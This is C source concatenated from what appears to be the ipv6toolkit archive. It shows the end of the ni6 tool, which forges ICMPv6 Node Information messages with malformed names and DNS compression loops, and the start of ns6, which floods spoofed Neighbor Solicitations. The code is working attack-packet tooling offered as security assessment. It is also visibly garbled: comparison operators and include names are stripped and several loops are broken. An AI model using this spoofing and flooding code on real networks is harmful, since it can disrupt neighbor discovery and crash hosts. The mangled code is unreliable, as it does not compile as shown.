in6_addr *)ptr= ipv6addrd; ptr= ptr+ sizeof(struct in6_addr); } else if(payloadsize_f){ if((ptr+payloadsize) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } for(i=0; i (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting IPv4 address"); return(-1); } *(struct in_addr *)ptr= ipv4addrd; ptr= ptr+ sizeof(struct in_addr); } else if(payloadsize_f){ if((ptr+payloadsize) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } for(i=0; ini_type= ICMP6_NI_QUERY; ni->ni_code= code; ni->ni_qtype= htons(qtype); ni->ni_flags= htons(flags); for(i=0; i<8; i++) ni->icmp6_ni_nonce[i]= random(); ptr= ptr + sizeof(struct icmp6_nodeinfo); if(ipv4addr_f){ if( (ptr+sizeof(struct in_addr)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting IPv4 address"); return(-1); } *(struct in_addr *)ptr= ipv4addr; ptr= ptr+ sizeof(struct in_addr); } else if(ipv6addr_f){ if( (ptr+sizeof(struct in6_addr)) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting IPv6 address"); return(-1); } *(struct in6_addr *)ptr= ipv6addr; ptr= ptr+ sizeof(struct in6_addr); } else if(name_f){ if((ptr+namelen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name"); return(-1); } bcopy(name, ptr, namelen); ptr+= namelen; if(snameslabel_f){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Error while inserting last label"); return(-1); } else{ *ptr=0; ptr++; } } } else if(fname_f && fnamelen>0){ if((ptr+fnamelen) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when inserting forged name"); return(-1); } i=fnamelen-1; /* There is a zero-length label at the end */ if(snameslabel_f && i>0) i=i-1; while(i>0){ if(i<= (maxlabel+1)){ /* This accounts for the length byte */ i=i-1; *ptr=i; ptr++; for(j=0; j1){ if((ptr+1) > (v6buffer + idata->max_packet_size)){ return(-1); } else{ *ptr=0; ptr++; } } } else if(exceedp_f){ if( (ptr+1) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large when 'exceeding' name"); return(-1); } *ptr= exceedp; ptr++; } else if(payloadsize_f){ if((ptr+payloadsize) > (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting randomized payload"); return(-1); } for(i=0; i (v6buffer + idata->max_packet_size)){ if(idata->verbose_f) puts("Packet too large while inserting name payload"); return(-1); } bzero(ptr, 4); ptr+=4; bcopy(slpointer, ptr, slsize); ptr+= slsize; } } ni->ni_cksum = 0; ni->ni_cksum = in_chksum(v6buffer, ni, ptr-(unsigned char *)ni, IPPROTO_ICMPV6); if(!fragh_f){ ipv6->ip6_plen = htons((ptr - v6buffer) - MIN_IPV6_HLEN); if((nw=pcap_inject(idata->pfd, buffer, ptr - buffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (ptr-buffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } else{ ptrend= ptr; ptr= fragpart; fptr = fragbuffer; fipv6 = (struct ip6_hdr *) (fragbuffer + idata->linkhsize); fptrend = fptr + idata->linkhsize+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD; memcpy(fptr, buffer, fragpart-buffer); fptr = fptr + (fragpart-buffer); if( (fptr+FRAG_HDR_SIZE)> fptrend){ puts("Unfragmentable Part is Too Large"); exit(EXIT_FAILURE); } memcpy(fptr, (char *) &fraghdr, FRAG_HDR_SIZE); fh= (struct ip6_frag *) fptr; fh->ip6f_ident=random(); startoffragment = fptr + FRAG_HDR_SIZE; /* * Check that the selected fragment size is not larger than the largest * fragment size that can be sent */ if(nfrags <= (fptrend - fptr)) fragsize=nfrags; else fragsize= (fptrend-fptr) & IP6F_OFF_MASK; m=IP6F_MORE_FRAG; while((ptr< ptrend) && m==IP6F_MORE_FRAG){ fptr= startoffragment; if( (ptrend-ptr) <= fragsize){ fragsize= ptrend-ptr; m=0; } memcpy(fptr, ptr, fragsize); fh->ip6f_offlg = (htons(ptr-fragpart) & IP6F_OFF_MASK) | m; ptr+=fragsize; fptr+=fragsize; fipv6->ip6_plen = htons((fptr - fragbuffer) - MIN_IPV6_HLEN - idata->linkhsize); if((nw=pcap_inject(idata->pfd, fragbuffer, fptr - fragbuffer)) == -1){ printf("pcap_inject(): %s\n", pcap_geterr(idata->pfd)); exit(EXIT_FAILURE); } if(nw != (fptr- fragbuffer)){ printf("pcap_inject(): only wrote %lu bytes (rather than %lu bytes)\n", (LUI) nw, (LUI) (ptr-buffer)); exit(EXIT_FAILURE); } } /* Sending fragments */ } /* Sending fragmented datagram */ return 0; } /* * Function: usage() * * Prints the syntax of the ni6 tool */ void usage(void){ puts("usage:\n" " ni6 -i INTERFACE [-S LINK_SRC_ADDR | -R] [-D LINK-DST-ADDR] \n" " [-s SRC_ADDR[/LEN] | -r] [-d DST_ADDR] [-c HOP_LIMIT] [-y FRAG_SIZE]\n" " [-u DST_OPT_HDR_SIZE] [-U DST_OPT_U_HDR_SIZE] [-H HBH_OPT_HDR_SIZE] \n" " [-P SIZE | -6 IPV6_ADDR | -4 IPV4_ADDR | -n NAME | -N LEN | -x LEN -o TYPE]\n" " [-Z SIZE] [-e] [-C ICMP6_CODE] [-q NI_QTYPE] [-X NI_FLAGS]\n" " [-P SIZE | -w IPV6_ADDR | -W IPV4_ADDR | -a NAME | -A LEN | -Q LEN -O TYPE]\n" " [-E] [-j PREFIX[/LEN]] [-k PREFIX[/LEN]] [-J LINK_ADDR]\n" " [-K LINK_ADDR] [-b PREFIX[/LEN]] [-g PREFIX[/LEN]] [-B LINK_ADDR]\n" " [-G LINK_ADDR] [-L | -l] [-z] [-v] [-h]"); } /* * Function: print_help() * * Prints help information for the ni6 tool */ void print_help(void){ puts(SI6_TOOLKIT); puts("ni6: Securty assessment tool for attack vectors based on ICMPv6 NI messages\n"); usage(); puts("\nOPTIONS:\n" " --interface, -i Network interface\n" " --link-src-address, -S Link-layer Destination Address\n" " --link-dst-address, -D Link-layer Source Address\n" " --src-address, -s IPv6 Source Address\n" " --dst-address, -d IPv6 Destination Address\n" " --hop-limit, -c IPv6 Hop Limit\n" " --frag-hdr. -y Fragment Header\n" " --dst-opt-hdr, -u Destination Options Header (Fragmentable Part)\n" " --dst-opt-u-hdr, -U Destination Options Header (Unfragmentable Part)\n" " --hbh-opt-hdr, -H Hop by Hop Options Header\n" " --payload-size, -P ICMPv6 NI payload size\n" " --subject-ipv6. -6 Subject IPv6 Address\n" " --subject-ipv4, -4 Subject IPv4 address\n" " --subject-name, -n Subject Name\n" " --subject-fname, -N Forge Subject Name of specific length\n" " --subject-ename, -x For (malformed) Subject name of specified length\n" " --subject-nloop, -o Subject is a Name with a DNS compression loop\n" " --max-label-size, -Z Maximum DNS label size (defaults to 63)\n" " --sname-slabel, -e Subject Name is a single-label name\n" " --code, -C ICMPv6 code\n" " --qtype, -q ICMPv6 NI Qtype\n" " --flags, -X ICMPv6 NI flags\n" " --data-ipv6, -w Data IPv6 Address\n" " --data-ipv4, W Data IPv4 Address\n" " --data-name, -a Data Name\n" " --data-fname, -A Forge Data Name of specific length\n" " --data-ename, -Q For (malformed) Data Name of specified length\n" " --data-nloop, -O Data is a Name with a DNS compression loop\n" " --dname-slabel, -E Subject Name is a single-label name\n" " --block-src, -j Block IPv6 Source Address prefix\n" " --block-dst, -k Block IPv6 Destination Address prefix\n" " --block-link-src, -J Block Ethernet Source Address\n" " --block-link-dst, -K Block Ethernet Destination Address\n" " --accept-src, -b Accept IPv6 Source Addres prefix\n" " --accept-dst, -g Accept IPv6 Destination Address prefix\n" " --accept-link-src, -B Accept Ethernet Source Address\n" " --accept-link-dst, -G Accept Ethernet Destination Address\n" " --forge-src-addr, -r Forge IPv6 Source Address\n" " --forge-link-src-addr, -R Forge link-layer Source Address\n" " --loop, -l Send periodic ICMPv6 error messages\n" " --sleep, -z Pause between sending ICMPv6 messages\n" " --listen, -L Listen to incoming traffic\n" " --help, -h Print help for the ni6 tool\n" " --verbose, -v Be verbose\n" "\n" " Programmed by Fernando Gont for SI6 Networks \n" " Please send any bug reports to \n" ); } /* * Function: print_attack_info() * * Prints attack details (when the verbose ("-v") option is specified). */ void print_attack_info(struct iface_data *idata){ puts( "ni6: Assessment tool for attack vectors based on ICMPv6 NI messages\n"); if(ether_ntop(&(idata->hsrcaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Source Address: %s%s\n", plinkaddr, ((!(idata->hsrcaddr_f))?" (randomized)":"")); /* Ethernet Destination Address only used if a IPv6 Destination Address or an Ethernet Destination Address were specified. */ if(idata->dstaddr_f){ if(ether_ntop(&(idata->hdstaddr), plinkaddr, sizeof(plinkaddr)) == 0){ puts("ether_ntop(): Error converting address"); exit(EXIT_FAILURE); } printf("Ethernet Destination Address: %s%s\n", plinkaddr, \ ((!idata->hdstaddr_f)?" (automatically selected)":"")); } if(idata->srcaddr_f){ if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Source Address: %s%s\n", psrcaddr, ((srcprefix_f)?" (randomized)":"")); } else{ if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->srcaddr), psrcaddr, sizeof(psrcaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Source Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Source Address: %s (automatically selected)\n", psrcaddr); } else puts("IPv6 Source Address: Automatically selected"); } if(idata->dstaddr_f){ if(inet_ntop(AF_INET6, &(idata->dstaddr), pdstaddr, sizeof(pdstaddr)) == NULL){ puts("inet_ntop(): Error converting IPv6 Destination Address to presentation format"); exit(EXIT_FAILURE); } printf("IPv6 Destination Address: %s\n", pdstaddr); } printf("IPv6 Hop Limit: %u%s\n", hoplimit, (hoplimit_f)?"":" (randomized)"); for(i=0; i1)?"s":""); } else if(exceedp_f){ printf("Subject Name: Malformed label of %u byte%s\n", exceedp, (exceedp>1)?"s":""); } break; case 2: printf(", Subject is an IPv4 Address (Code %u)\n", code); if(ipv4addr_f){ if(inet_ntop(AF_INET, &ipv4addr, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Subject IPv4 Address to presentation format"); exit(EXIT_FAILURE); } printf("Subject IPv4 Address: %s\n", pv6addr); } break; default: printf(", Unknown ICMPv6 code (Code %u)\n", code); break; } switch(qtype){ case NI_QTYPE_NOOP: printf("Qtype: NOOP (Qtype %u)\n", qtype); break; case NI_QTYPE_SUPTYPES: printf("Qtype: Subtypes (?) (Qtype %u)\n", qtype); break; case NI_QTYPE_DNSNAME: printf("Qtype: Node Name (Qtype %u)\n", qtype); break; case NI_QTYPE_NODEADDR: printf("Qtype: Node Addresses (Qtype %u)\n", qtype); break; case NI_QTYPE_IPV4ADDR: printf("Qtype: IPv4 Addresses (Qtype %u)\n", qtype); break; default: printf("Qtype: (Qtype %u)\n", qtype); break; } } else if(type == ICMP6_NI_REPLY){ printf("ICMPv6 NI Reply (Type 140)"); switch(qtype){ case 0: puts(", NOOP (Qtype 0)"); case 1: puts(", Supported Qtypes (Qtype 1)"); case 2: printf(", Data is a Name (Qtype %u)\n", qtype); if(named_f){ printf("Data Name: %s%s\n", printnamed, (snamedslabel_f)?" (single label name)":""); } else if(fnamed_f){ printf("Data Name: Forged Name of %u byte%s\n", fnamedlen, (fnamedlen>1)?"s":""); } else if(exceedpd_f){ printf("Data Name: Malformed label of %u byte%s\n", exceedp, (exceedp>1)?"s":""); } break; case 3: printf(", Data contains IPv6 address(es) (Qtype %u)\n", qtype); if(ipv6addrd_f){ if(inet_ntop(AF_INET6, &ipv6addrd, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Subject IPv6 Address to presentation format"); exit(EXIT_FAILURE); } printf("Data IPv6 Address: %s\n", pv6addr); } break; case 4: printf(", Data contains IPv4 Address(es) (Qtype %u)\n", qtype); if(ipv4addrd_f){ if(inet_ntop(AF_INET, &ipv4addrd, pv6addr, sizeof(pv6addr)) == NULL){ puts("inet_ntop(): Error converting Data IPv4 Address to presentation format"); exit(EXIT_FAILURE); } printf("Data IPv4 Address: %s\n", pv6addr); } break; default: printf(", Unknown ICMPv6 NI Query type (Qtype %u)\n", qtype); break; } } if(flags_f || type== ICMP6_NI_QUERY){ printf("Flags: %s%s%s%s%s%s%s%s\n\n", ((flags & NI_NODEADDR_FLAG_GLOBAL)?"G":""), \ ((flags & NI_NODEADDR_FLAG_SITELOCAL)?"S":""), \ ((flags & NI_NODEADDR_FLAG_LINKLOCAL)?"L":""), \ ((flags & NI_NODEADDR_FLAG_COMPAT)?"C":""),\ ((flags & NI_NODEADDR_FLAG_ALL)?"A":""), \ ((flags & NI_NODEADDR_FLAG_TRUNCATE)?"T":""),\ ((!flags)?"none":""), ((!flags_f)?" (default)":"")); } } ipv6toolkit-1.5.1/tools/ni6.h000066400000000000000000000001121223702747200160150ustar00rootroot00000000000000/* * Header file for the ni6 tool * */ #define QUERY_TIMEOUT 2 ipv6toolkit-1.5.1/tools/ns6.c000066400000000000000000000732571223702747200160460ustar00rootroot00000000000000/* * ns6: A security assessment tool for attack vectors based on * ICMPv6 Neighbor Solicitation messages * * Copyright (C) 2009-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * * Build with: make ns6 * * The libpcap library must be previously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "ns6.h" #include "libipv6.h" #include "ipv6toolkit.h" void init_packet_data(struct iface_data *); void send_packet(struct iface_data *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; unsigned char buffer[65556]; unsigned char *v6buffer, *ptr, *startofprefixes; struct ip6_hdr *ipv6; struct nd_neighbor_solicit *ns; struct ether_header *ethernet, *pkt_ether; struct nd_opt_slla *sllaopt; struct in6_addr targetaddr; char *lasts, *endptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand, sources, nsources, targets, ntargets; u_int16_t mask; u_int8_t hoplimit; struct ether_addr linkaddr[MAX_SLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; unsigned int nsleep; char *charptr; char plinkaddr[ETHER_ADDR_PLEN], phsrcaddr[ETHER_ADDR_PLEN], phdstaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char sllopt_f=0, sllopta_f=0, targetprefix_f=0, targetaddr_f=0; unsigned char loop_f = 0, sleep_f=0, floods_f=0, floodt_f=0, newdata_f=0, hoplimit_f=0; unsigned char targetpreflen; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragh_f=0; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize, max_packet_size; unsigned char *prev_nh, *startoffragment; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; int r; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-address", required_argument, 0, 'S'}, {"link-dst-address", required_argument, 0, 'D'}, {"target-address", required_argument, 0, 't'}, {"source-lla-opt", required_argument, 0, 'E'}, {"add-slla-opt", no_argument, 0, 'e'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-targets", required_argument, 0, 'T'}, {"loop", no_argument, 0, 'l'}, {"sleep", no_argument, 0, 'z'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'} }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:t:eE:F:T:lz:vh"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option =r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=1; break; case 's': /* IPv6 Source Address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ if( inet_pton(AF_INET6, optarg, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen <= 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 't': /* NA Target address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Target Address not valid"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Target Address not valid"); exit(EXIT_FAILURE); } targetaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ targetpreflen = atoi(charptr); if(targetpreflen>128){ puts("Prefix length error in Target Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&targetaddr, targetpreflen); targetprefix_f=1; } break; case 'E': /* Source link-layer option */ sllopt_f = 1; if(ether_pton(optarg, &linkaddr[nlinkaddr], sizeof(struct ether_addr)) == 0){ puts("Error in Source link-layer address option."); exit(EXIT_FAILURE); } sllopta_f=1; nlinkaddr++; break; case 'e': /* Add Source link-layer option */ sllopt_f = 1; break; case 'F': /* Flood sources */ nsources= atoi(optarg); if(nsources == 0){ puts("Invalid number of sources in option -F"); exit(EXIT_FAILURE); } floods_f= 1; break; case 'T': /* Flood targets */ ntargets= atoi(optarg); if(ntargets == 0){ puts("Invalid number of Target Addresses in option -T"); exit(EXIT_FAILURE); } floodt_f= 1; break; case 'l': /* "Loop mode */ loop_f = 1; break; case 'z': /* Sleep option */ nsleep=atoi(optarg); if(nsleep==0){ puts("Invalid number of seconds in '-z' option"); exit(EXIT_FAILURE); } sleep_f=1; break; case 'v': /* Be verbose */ idata.verbose_f=1; break; case 'h': /* Help */ print_help(); exit(EXIT_FAILURE); break; default: usage(); exit(EXIT_FAILURE); break; } /* switch */ } /* while(getopt) */ if(geteuid()) { puts("ns6 needs root privileges to run."); exit(EXIT_FAILURE); } if(!idata.iface_f){ puts("Must specify the network interface with the -i option"); exit(EXIT_FAILURE); } if(!targetaddr_f){ puts("Must specify a ND target address with the '-t' option"); exit(EXIT_FAILURE); } if(load_dst_and_pcap(&idata, LOAD_PCAP_ONLY) == FAILURE){ puts("Error while learning Souce Address and Next Hop"); exit(EXIT_FAILURE); } release_privileges(); if(pcap_compile(idata.pfd, &pcap_filter, PCAP_NOPACKETS_FILTER, PCAP_OPT, PCAP_NETMASK_UNKNOWN) == -1){ printf("pcap_compile(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } if(pcap_setfilter(idata.pfd, &pcap_filter) == -1){ printf("pcap_setfilter(): %s", pcap_geterr(idata.pfd)); exit(EXIT_FAILURE); } pcap_freecode(&pcap_filter); srandom(time(NULL)); /* If the IPv6 Source Address has not been specified, and the "-F" (flood) option has not been specified, select a random link-local unicast address. */ if(!idata.srcaddr_f && !floods_f){ /* When randomizing a link-local IPv6 address, select addresses that belong to the prefix fe80::/64 (that's what a link-local address looks-like in legitimate cases). The KAME implementation discards addresses in which the second highe-order 16 bits (srcaddr.s6_addr16[1] in our case) are not zero. */ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<4;i++) idata.srcaddr.s6_addr16[i]=0x0000; for(i=4; i<8; i++) idata.srcaddr.s6_addr16[i]=random(); } /* If the flood option ("-F") has been specified, but no prefix has been specified, select the random Source Addresses from the link-local unicast prefix (fe80::/64). */ if(floods_f && !idata.srcprefix_f){ idata.srcaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) idata.srcaddr.s6_addr16[i]=0x0000; idata.srcpreflen=64; } /* If the flood target option ("-T") was specified, but no prefix was specified, select the random Target Addresses from the link-local unicast prefix (fe80::/64). */ if(floodt_f && !targetprefix_f){ targetaddr.s6_addr16[0]= htons(0xfe80); /* Link-local unicast prefix */ for(i=1;i<8;i++) targetaddr.s6_addr16[i]=0x0000; targetpreflen=64; } if(!floodt_f) ntargets=1; if(!idata.dstaddr_f){ /* Destination Address defaults to all-nodes (ff02::1) */ if( inet_pton(AF_INET6, ALL_NODES_MULTICAST_ADDR, &(idata.dstaddr)) <= 0){ puts("inet_pton(): address not valid"); exit(EXIT_FAILURE); } } if(!idata.hsrcaddr_f && !floods_f) /* Source link-layer address is randomized by default */ for(i=0; i<6; i++) idata.hsrcaddr.a[i]= random(); if(sllopt_f && !sllopta_f){ /* The value of the source link-layer address option */ linkaddr[0]= idata.hsrcaddr; /* defaults to the source Ethernet address */ nlinkaddr++; } if(!idata.hdstaddr_f) /* Destination link-layer address defaults to all-nodes */ if(ether_pton(ETHER_ALLNODES_LINK_ADDR, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("ether_pton(): Error converting all-nodes multicast address"); exit(EXIT_FAILURE); } if(!floods_f) nsources=1; if(!sleep_f) nsleep=1; if( !fragh_f && dstoptuhdr_f){ puts("Dst. Options Header (Unfragmentable Part) set, but Fragmentation not specified"); exit(EXIT_FAILURE); } if(fragh_f) max_packet_size = MAX_IPV6_PAYLOAD + MIN_IPV6_HLEN; else max_packet_size = ETH_DATA_LEN; if(idata.verbose_f){ print_attack_info(&idata); } /* Set initial contents of the attack packet */ init_packet_data(&idata); /* Fire a Neighbor Solicitarion message */ send_packet(&idata); if(idata.verbose_f) puts("Initial attack packet(s) sent successfully."); if(loop_f && idata.verbose_f) printf("Now sending Neighbor Solicitations every %u second%s...\n", nsleep, \ ((nsleep>1)?"s":"")); while(loop_f){ sleep(nsleep); send_packet(&idata); } exit(EXIT_SUCCESS); } /* * Function: init_packet_data() * * Initialize the contents of the attack packet (Ethernet header, IPv6 Header, and ICMPv6 header) * that are expected to remain constant for the specified attack. */ void init_packet_data(struct iface_data *idata){ ethernet= (struct ether_header *) buffer; v6buffer = buffer + idata->linkhsize; ipv6 = (struct ip6_hdr *) v6buffer; if(idata->flags != IFACE_TUNNEL && idata->flags != IFACE_LOOPBACK){ ethernet->src = idata->hsrcaddr; ethernet->dst = idata->hdstaddr; ethernet->ether_type = htons(ETHERTYPE_IPV6); } ipv6->ip6_flow=0; ipv6->ip6_vfc= 0x60; ipv6->ip6_hlim= hoplimit; ipv6->ip6_src= idata->srcaddr; ipv6->ip6_dst= idata->dstaddr; prev_nh = (unsigned char *) &(ipv6->ip6_nxt); ptr = (unsigned char *) v6buffer + MIN_IPV6_HLEN; if(hbhopthdr_f){ hbhopthdrs=0; while(hbhopthdrs < nhbhopthdr){ if((ptr+ hbhopthdrlen[hbhopthdrs]) > (v6buffer+ ETH_DATA_LEN)){ puts("Packet too large while processing HBH Opt. Header"); exit(EXIT_FAILURE); } *prev_nh = IPPROTO_HOPOPTS; prev_nh = ptr; memcpy(ptr, hbhopthdr[hbhopthdrs], hbhopthdrlen[hbhopthdrs]); ptr = ptr + hbhopthdrlen[hbhopthdrs]; hbhopthdrs++; } } if(dstoptuhdr_f){ dstoptuhdrs=0; while(dstoptuhdrs < ndstoptuhdr){ 